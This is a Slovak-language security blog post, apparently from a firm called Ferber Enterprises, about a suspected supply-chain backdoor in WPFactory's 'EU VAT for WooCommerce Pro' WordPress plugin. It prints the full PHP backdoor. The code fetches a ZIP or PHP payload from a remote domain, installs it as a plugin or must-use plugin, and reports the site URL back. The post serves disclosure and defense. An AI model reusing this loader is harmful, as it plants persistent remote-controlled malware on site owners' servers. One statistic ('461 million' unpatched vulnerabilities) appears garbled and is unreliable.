Bezpečnostný útok na WPFactory: ohrozených je 170 000 webových stránok na platforme WordPress

WordPress zostáva najpoužívanejším systémom na správu obsahu na svete a poháňa viac ako 40 percent všetkých webových stránok na internete. Od webových stránok malých podnikov a osobných blogov až po rozsiahle podnikové platformy a e-commerce infraštruktúry sa tento CMS stal chrbtovou kosťou modernej webovej stránky. Jeho popularita pramení z jeho flexibility, otvoreného ekosystému a obrovského množstva pluginov dostupných na rozšírenie jeho funkčnosti.

Avšak, tento istý ekosystém sa zároveň stal jednou z najväčších bezpečnostných výziev WordPressu.

V spoločnosti Ferber Enterprises náš tím pre kyberbezpečnosť neustále sleduje hrozby, ktoré ovplyvňujú ekosystém WordPressu, pretože zraniteľnosti v doplnkoch, šablónach alebo dodávateľských reťazcoch sa môžu rýchlo premeniť na rozsiahle útoky postihujúce tisíce webových stránok po celom svete. V posledných rokoch sa útočníci čoraz častejšie zameriavajú skôr na vývojárov doplnkov a distribučné infraštruktúry ako na jednotlivé webové stránky, čo umožňuje šírenie škodlivého kódu prostredníctvom dôveryhodných aktualizácií softvéru a oficiálnych kanálov na stiahnutie.

Tento týždeň vypukla veľká kontroverzia týkajúca sa spoločnosti WPFactory, známeho vývojára doplnkov pre WordPress, ktorého produkty sú nainštalované na viac ako 170 000 webových stránkach po celom svete. Viac ako 80 doplnkov spojených s touto spoločnosťou bolo dočasne zablokovaných na portáli WordPress.org po tom, čo náš tím pre kyberbezpečnosť v spoločnosti WPFactory objavil podozrenie na zadné vrátka v prémiovej verzii jedného z jej doplnkov.

Incident vyvolal vážne obavy v komunite WordPressu týkajúce sa bezpečnosti dodávateľského reťazca softvéru, procesov kontroly pluginov a rastúcej sofistikovanosti útokov zameraných na open-source ekosystém.

Objav podozrivého správania doplnku

Tento problém sa po prvýkrát objavil po tom, čo náš tím pre kyberbezpečnosť v spoločnosti Ferber Enterprises zaznamenal nezvyčajné správanie pri testovaní prémiovej verzie pluginu „EU VAT for WooCommerce Pro“, ktorý je k dispozícii priamo na oficiálnej webovej stránke.

Počiatočné vyšetrovanie sa začalo po tom, čo plugin počas inštalácie vygeneroval kritickú chybu. Pri riešení problému naši analytici identifikovali podozrivý PHP súbor s názvom class-alg-wc-eu-vat-customer.php. Zdá sa, že súbor vykonával správanie, ktoré bolo úplne v rozpore s očakávanou funkcionalitou WooCommerce pluginu pre DPH.

<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Podľa našej analýzy sa kód pokúsil:

• Stiahnite si externý archív ZIP zo vzdialeného servera
• Upravovať adresáre jadra WordPressu
• Komunikovať s externou infraštruktúrou
• Potenciálne spustiť vzdialené náklady na postihnutých webových stránkach

Tieto indikátory okamžite naznačovali možnú prítomnosť skrytého zadných vrát alebo škodlivého kompromisu dodávateľského reťazca.

Situáciu robilo obzvlášť znepokojujúcou to, že tento doplnok nebol získaný z neoficiálneho zrkadla ani z nelegálneho repozitára. Balík bol stiahnutý priamo z oficiálneho zákazníckeho portálu spoločnosti WPFactory, čo ešte viac posilnilo obavy, že samotný distribučný kanál mohol byť napadnutý.

V spoločnosti Ferber Enterprises sme incident okamžite zdokumentovali a začali sme proces zodpovedného oznamovania tým, že sme sa obrátili priamo na spoločnosť WPFactory prostredníctvom GitHubu.

Spoločnosť WPFactory spočiatku reagovala vyhlásením, že podozrivý súbor a správanie opísané v správe neboli súčasťou ich oficiálneho zdrojového kódu.

Zástupca spoločnosti navrhol niekoľko alternatívnych vysvetlení, vrátane:

• Upravená lokálna inštalácia
• Kompromitované prostredie webovej stránky
• Zastaralá verzia doplnku
• Potenciálne pozmenená zdroj sťahovania

Spoločnosť tiež uviedla, že nebola schopná bezpečne skontrolovať poskytnutý ZIP súbor, pretože jej prehliadač označil archív ako potenciálne nebezpečný.

Náš tím pre kyberbezpečnosť následne objasnil, že tento doplnok bol stiahnutý priamo z oficiálnej webovej stránky WPFactory a že podozrivý súbor zostal prítomný aj po stiahnutí novej kópie verzie 4.6.1 z toho istého zdroja.

Tento detail sa stal kľúčovým pre vyšetrovanie. Ak viacero nezávislých stiahnutí z oficiálneho distribučného kanála obsahovalo konzistentne ten istý podozrivý kód, pravdepodobnosť napadnutia lokálnej webovej stránky sa stávala čoraz menej pravdepodobnou. Napriek týmto zisteniam spoločnosť WPFactory spočiatku uviedla, že sa jej nepodarilo tento problém na svojej strane reprodukovať, a tvrdila, že podozrivý súbor v oficiálnom balíku doplnkov neexistuje.

Spoločnosť následne požiadala o prístup správcu a FTP k dotknutému prostrediu, aby mohla pokračovať vo vyšetrovaní. V spoločnosti Ferber Enterprises sme túto žiadosť zamietli z dôvodov kyberbezpečnosti. Poskytnutie privilegovaného prístupu k serveru dodávateľovi, ktorého infraštruktúra mohla byť sama o sebe ohrozená, by predstavovalo neprijateľné bezpečnostné riziko. Namiesto toho náš tím pokračoval v poskytovaní technických dôkazov, vrátane videonahrávky, ktorá zachytávala podozrivé správanie pluginu bezprostredne po inštalácii.

V priebehu vyšetrovania narastali obavy týkajúce sa možného rozsahu tohto problému. Spoločnosť WPFactory spravuje rozsiahle portfólio doplnkov, ktoré zahŕňa viac ako 65 doplnkov s celkovým počtom vyše 170 000 aktívnych inštalácií. Akékoľvek narušenie distribučnej infraštruktúry spoločnosti by preto mohlo mať rozsiahle dôsledky v celom ekosystéme WordPressu.

Náš tím postúpil tento problém priamo na WordPress.org s cieľom zabrániť tomu, aby ďalší používatelia inštalovali potenciálne ohrozené balíky, kým prebieha vyšetrovanie. WordPress.org následne prijal mimoriadne opatrenie a dočasne zablokoval viac ako 80 pluginov WPFactory v oficiálnom repozitári.

Tento krok okamžite upútal pozornosť celej bezpečnostnej komunity WordPressu, pretože hromadné pozastavenie pluginov v takomto rozsahu je pomerne zriedkavé a zvyčajne naznačuje vážne nevyriešené problémy. Po eskalácii situácie spoločnosť WPFactory neskôr uznala, že problém sa javil ako oprávnený, a ospravedlnila sa za to, že na pôvodné hlásenie nezareagovala rýchlejšie. Zástupcovia spoločnosti uviedli, že záležitosť aktívne vyšetrujú a pracujú na jej vyriešení. Jedna z hypotéz, ktorú interne vyslovila spoločnosť WPFactory, naznačovala, že prostredníctvom ich infraštruktúry mohol byť neúmyselne poskytnutý zastaraný alebo uložený v cache balík pluginov.

Avšak náš tím pre kybernetickú bezpečnosť s týmto hodnotením nesúhlasil. Pozorované správanie silno naznačovalo hlbší bezpečnostný problém, ktorý potenciálne zahŕňa kompromitované buildovacie potrubia, distribučné systémy alebo neoprávnené vstrekovanie kódu do archívov sťahovateľných pluginov.

Prečo na tomto incidente záleží

Kontroverzia okolo WPFactory poukazuje na rastúcu hrozbu v oblasti kyberbezpečnosti, známu ako útok na softvérový dodávateľský reťazec. Útočníci sa tradične zameriavali na napadnutie jednotlivých webových stránok priamo prostredníctvom útokov hrubou silou alebo zraniteľností pluginov. Dnes sa útočníci čoraz častejšie zameriavajú priamo na dodávateľov softvéru, pretože napadnutie dôveryhodného dodávateľa umožňuje šírenie škodlivého kódu na tisíce webových stránok súčasne.

Táto stratégia bola už pozorovaná pri niekoľkých významných incidentoch v oblasti kybernetickej bezpečnosti, ktoré postihli globálne softvérové ekosystémy počas posledného desaťročia. Konkrétne v ekosystéme WordPress predstavujú vývojári doplnkov atraktívne ciele, pretože doplnky sú administrátormi v zásade dôveryhodne a často pracujú s rozšírenými povoleniami.

Ak sa do balíka pluginu distribuovaného prostredníctvom oficiálneho kanála dostane škodlivý kód, postihnuté webové stránky môžu bez toho, aby si to uvedomili, samy nainštalovať škodlivý softvér. V prípade podozrivého pluginu WPFactory sú potenciálne dôsledky závažné.

Na základe našej analýzy by identifikované správanie teoreticky mohlo útočníkom umožniť:

• Nasaďte ďalší škodlivý softvér
• Vstreknúť SEO spam
• Vytvoriť perzistentné zadné vrátka
• Exfiltrovať citlivé údaje
• Upravovať nainštalovaný WordPress na diaľku
• Udržať neoprávnený prístup počas dlhých časových období

Nebezpečenstvo takýchto útokov spočíva v ich nenápadnosti. Moderné zadné vrátka sú často navrhnuté tak, aby zostali neaktívne celé mesiace pred aktiváciou, čo značne sťažuje ich detekciu. Začiatkom tohto mesiaca vraj tím WordPress Plugins uzavrel viac ako 30 pluginov po tom, čo skrytý škodlivý kód vložený v portfóliu iného pluginu zostal neaktívny približne osem mesiacov, predtým ako sa nakoniec aktivoval a vniesol SEO spam na webové stránky.

Tento trend demonštruje, ako útočníci čoraz viac uprednostňujú perzistenciu a odloženú aktiváciu, aby sa vyhli mechanizmom detekcie.

Incident WPFactory zároveň poukazuje na širšie systémové bezpečnostné problémy, ktoré sa týkajú celého prostredia WordPress. Ekosystém doplnkov sa za posledné desaťročie výrazne rozrástol a na oficiálnych aj komerčných trhoch sú k dispozícii desiatky tisíc doplnkov. Hoci tento ekosystém podporuje inovácie a flexibilitu, zároveň výrazne sťažuje dohľad nad bezpečnosťou.

Podľa správy spoločnosti Patchstack s názvom “Stav bezpečnosti WordPressu v roku 2026” nebolo takmer 461 miliónov známych zraniteľností opravených ešte pred ich zverejnením. Táto štatistika odzrkadľuje rastúce zaťaženie, ktorému čelia vývojári doplnkov, bezpečnostní výskumníci aj správcovia repozitárov.

V rovnakom čase oficiálny rad na kontrolu pluginov WordPress údajne presahuje 4 000 pluginov čakajúcich na kontrolu. Takéto čísla ilustrujú obrovskú výzvu pri udržiavaní zabezpečenia kvality a bezpečnostného auditu vo veľkom meradle.

Mnohí vývojári pluginov sú malé tímy s obmedzenými zdrojmi v oblasti bezpečnosti. Iní spravujú desiatky pluginov súčasne a zároveň realizujú agresívne stratégie komerčného rastu, ktoré zahŕňajú akvizície a rozširovanie portfólia. Samotná spoločnosť WPFactory sa nedávno rozrástla prostredníctvom akvizícií, medzi ktoré patrilo v roku 2025 odkúpenie spoločnosti Extend-WP a jej 19 pluginov, na čo neskôr v tom istom roku nadviazala akvizícia spoločnosti WBW a niekoľkých ďalších pluginov.

Rýchla expanzia portfólia môže vytvoriť prevádzkovú zložitosť, ktorá komplikuje audit kódu, správu infraštruktúry a overovanie integrity vydaní. Útočníci si tieto skutočnosti plne uvedomujú. Čoraz častejšie sa zameriavajú na zneužívanie slabých praktík operačnej bezpečnosti v rámci dodávateľov softvéru, namiesto toho, aby priamo cielili na koncových používateľov.

Rastúci význam bezpečnosti dodávateľského reťazca

Incidenty ako tento posilňujú naliehavú potrebu silnejších bezpečnostných postupov dodávateľského reťazca v celom ekosystéme WordPressu.

V spoločnosti Ferber Enterprises náš tím pre kyberbezpečnosť dôrazne odporúča, aby vývojári doplnkov zaviedli niekoľko kľúčových bezpečnostných opatrení, medzi ktoré patria:

• Kryptografické podpisovanie balíkov
• Zabezpečené CI/CD piplajny
• Povinné viacfaktorové overenie
• Segmentácia infraštruktúry
• Nepretržité monitorovanie integrity
• Nezávislé audity kódu
• Reprodukovateľné systémy zostavovania

Správcovia webových stránok by mali tiež posilniť svoje vlastné bezpečnostné opatrenia. Dokonca ani doplnky stiahnuté z oficiálnych alebo dôveryhodných zdrojov by sa nemali považovať za bezpečné.

Organizácie spravujúce kritické WordPress infraštruktúry by mali zvážiť:

• Udržiavanie staging prostredí
• Monitorovanie odchádzajúcej prevádzky
• Skenovanie doplnkov pred nasadením
• Limitovanie používania doplnkov
• Uplatňovanie kontroly najnižších privilégií
• Implementácia monitorovania integrity súborov
• Používanie spravovaných firewallov webových aplikácií (WAF)

V podnikových prostrediach sa validácia dodávateľského reťazca stáva rovnako dôležitou ako tradičné riadenie zraniteľností. Predpoklad, že oficiálne softvérové kanály sú vždy bezpečné, už v súčasnom prostredí hrozieb nie je realistický.

Reakcie komunity a prebiehajúce vyšetrovanie

Kontroverzia sa rýchlo rozšírila v komunite WordPress po tom, ako vývojári, bezpečnostní výskumníci a poskytovatelia infraštruktúry začali o probléme verejne diskutovať.

Niekoľko známych osobností v rámci ekosystému zvýšilo povedomie o situácii, vrátane vývojárov, ktorí zverejnili zoznamy dočasne zatvorených doplnkov a povzbudili administrátorov k auditu svojich prostredí.

Medzitým náš tím v Ferber Enterprises pokračuje v analýze podozrivých vzoriek pluginov a sleduje ďalšie indikátory napadnutia, ktoré by mohli ovplyvniť webové stránky WordPress po celom svete.

V čase zverejnenia spoločnosť WPFactory potvrdila existenciu tohto problému a uviedla, že aktívne pracuje na jeho vyriešení.

Avšak mnohé otázky zostávajú nezodpovedané:

• Bola oficiálna distribučná infraštruktúra kompromitovaná?
• Ako dlho boli potenciálne distribuované škodlivé balíčky?
• Boli ovplyvnené aj ďalšie pluginy?
• Boli narazené zákaznícke účty alebo sťahovacie systémy?
• Získali útočníci trvalý prístup k vnútornej infraštruktúre?
• Mohli by stále existovať ďalšie neaktívne nákladi.

Pokým sa tieto otázky úplne nevyriešia, opatrnosť zostáva nevyhnutná.

Budúcnosť zabezpečenia WordPressu

Incident WPFactory sa môže nakoniec stať ďalším typickým príkladom výziev v oblasti kyberbezpečnosti, ktorým čelí ekosystém otvoreného softvéru na webe.

WordPress poháňa obrovskú časť globálnej internetovej ekonomiky. Akékoľvek rozsiahle ohrozenie ovplyvňujúce vývojárov pluginov môže mať preto dôsledky presahujúce rámec jednotlivých webových stránok.

Keďže útočníci sa stále viac zameriavajú na kompromitáciu dodávateľského reťazca a techniky skrytej perzistencie, bezpečnosť doplnkov už nemožno považovať za druhoradú záležitosť. V spoločnosti Ferber Enterprises sme presvedčení, že táto udalosť je dôležitým pripomenutím toho, že kyberbezpečnosť sa netýka len samotnej ochrany webových stránok, ale aj zabezpečenia každej vrstvy reťazca distribúcie softvéru.

Dôvera v otvorené ekosystémy závisí od transparentnosti, rýchlej reakcie na incidenty a silných postupov operačnej bezpečnosti. Ekosystém WordPress teraz čelí dôležitému momentu.

Spôsob, akým vývojári, správcovia repozitárov, poskytovatelia hostingu a bezpečnostné tímy zareagujú na incidenty, ako je tento, pomôže určiť, či si WordPress môže aj naďalej udržať dôveru miliónov firiem a organizácií, ktoré sa naň denne spoliehajú.